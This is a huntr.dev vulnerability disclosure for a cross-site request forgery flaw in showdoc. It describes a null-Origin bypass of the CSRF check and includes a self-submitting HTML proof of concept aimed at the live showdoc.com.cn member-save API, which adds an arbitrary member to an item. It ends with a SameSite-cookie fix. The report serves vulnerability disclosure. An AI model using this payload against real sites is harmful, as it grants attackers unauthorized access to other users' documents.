Lucene search

K
huntrAmammadE0EDF27D-437E-44FE-907A-DF020F385304
HistorySep 06, 2021 - 10:18 a.m.

Cross-Site Request Forgery (CSRF) in star7th/showdoc

2021-09-0610:18:48
amammad
www.huntr.dev
6

0.001 Low

EPSS

Percentile

31.2%

✍️ Description

With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker website.

We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to null and we can bypass CSRF protection.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari.

2.now you can check that member with email address test that already should registered before have access to item with id 1531601670203340.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
      <input type="hidden" name="item_id" value="1531601670203344" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="cat_id" value="0" />
      <input type="hidden" name="member_group_id" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of reveal any item.

Fix

Set SameSite attribute of cookies to Lax or Strict.

0.001 Low

EPSS

Percentile

31.2%

Related for E0EDF27D-437E-44FE-907A-DF020F385304